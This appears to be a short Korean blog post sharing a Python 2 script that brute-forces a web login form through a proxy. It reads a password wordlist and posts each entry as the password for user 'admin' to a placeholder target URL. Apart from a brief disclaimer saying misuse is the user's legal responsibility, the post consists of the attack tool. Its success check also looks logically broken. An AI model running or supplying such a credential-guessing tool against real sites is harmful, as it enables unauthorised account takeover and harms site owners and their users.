python brute force http, https with proxy
Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다. 연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다. python brute force http, https with proxy
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 |
# -*- coding: utf-8 -*- import urllib, urllib2, optparse, time opener = urllib2.build_opener( urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.ProxyHandler({'http': 'http://proxy_url:port', 'https': 'http://proxy_url:port'})) urllib2.install_opener(opener) def post_request(url, params) : param = urllib.urlencode(params) request = urllib2.Request(url, param) response = urllib2.urlopen(request) response_info = response.info() response_html = response.read() response.close() if response_html.find('用'.decode('gb2312').encode('utf-8'), 0, 100) : print(" .") else : print("found password!!") def get_request(url) : response = urllib2.urlopen(url) response_info = response.info() response_html = response.read() response.close() def main(): parser = optparse.OptionParser('usage bf.py -f passwordfile') parser.add_option('-f', dest='filename', type='string', help='input file') (options, args) = parser.parse_args() filename = options.filename if filename == None : print parser.usage exit(0) f = file(filename, 'r') while True: line = f.readline() if not line : # file end break else : print ("passwd : " + line.rstrip('\n')) post_url = "https://target.domain/path/login.action" post_params = { 'paraam1':'test', 'UserId':'admin', 'UserPass':line.rstrip('\n') } post_request(post_url, post_params) time.sleep(1) if __name__ == '__main__': main() |